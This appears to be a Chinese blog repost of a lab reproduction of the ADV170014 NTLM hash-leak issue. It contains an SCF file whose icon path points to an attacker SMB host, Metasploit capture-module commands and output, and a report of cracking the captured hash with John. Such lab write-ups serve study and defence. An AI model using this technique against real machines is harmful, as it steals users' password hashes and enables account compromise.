ADV170014 NTLM SSO 漏洞复现

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ADV170014 NTLM SSO 漏洞复现相关的知识,希望对你有一定的参考价值。

2017年10月,微软周二补丁日发布的补丁中有一个可选的安全补丁:ADV170014,这个补丁修复了NTLM认证机制的一个bug,恶意攻击者可以利用这个bug窃取用户密码hash并可以远程利用该漏洞让目标机器死机。

0x01    攻击环境:

kali      192.168.2.96

windows7  192.168.2.94

0x02    模拟攻击:

在windows7上建立一个共享文件夹,并设置everyone读取权限,访问密码

技术分享

技术分享

然后关闭访问密码

技术分享

修改自己当前设置的配置,我这里网络配置的为公用

技术分享

技术分享

技术分享

这时候就可以通过共享访问share文件夹了

这时候放一个scf文件到该文件夹,内容如下:

[Shell]
Command=2
IconFile=\\\\192.168.2.96\\share\\test.ico
[Taskbar]
Command=ToggleDesktop

 这里的ip这是为kali的ip(因为我之后要再kali上运行metasploit)

运行kali中metasploit,并使用auxiliary/server/capture/smb模块

设置JOHNPWFILE路径

msf > use auxiliary/server/capture/smb 
msf auxiliary(smb) > show options 

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte server challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in John format
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.


Auxiliary action:

   Name     Description
   ----     -----------
   Sniffer  


msf auxiliary(smb) > set johnpwfile /tmp/hash.txt
johnpwfile => /tmp/hash.txt
msf auxiliary(smb) > run
[*] Auxiliary module running as background job 0.

[*] Server started.
msf auxiliary(smb) > 

  这时候msf已经开始监听

 

为了节省虚拟机内存,我直接用windows7 自己去测试

技术分享

技术分享

然后kali中就监听到了数据

技术分享

密码的hash加密

此时,我们设置了文件的保存位置,进入该目录下,使用john命令来破解密码

技术分享

成功得到用户名为admin  ,密码为1234。

 

 

 

该文章参考自:https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458286248&idx=1&sn=4cdbf73f47753a979024958622b468e7&chksm=b181482286f6c1348bfb6be7e52716381befddb979c5e7b94335c71f9532e9691e979833df78&scene=38#wechat_redirect

 

以上是关于ADV170014 NTLM SSO 漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现

漏洞复现海洋CMS6.28远程代码执行

漏洞复现海洋CMS6.28远程代码执行

利用.NET反序列化漏洞获取NTLM Hashes

Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御

任意代码执行漏洞复现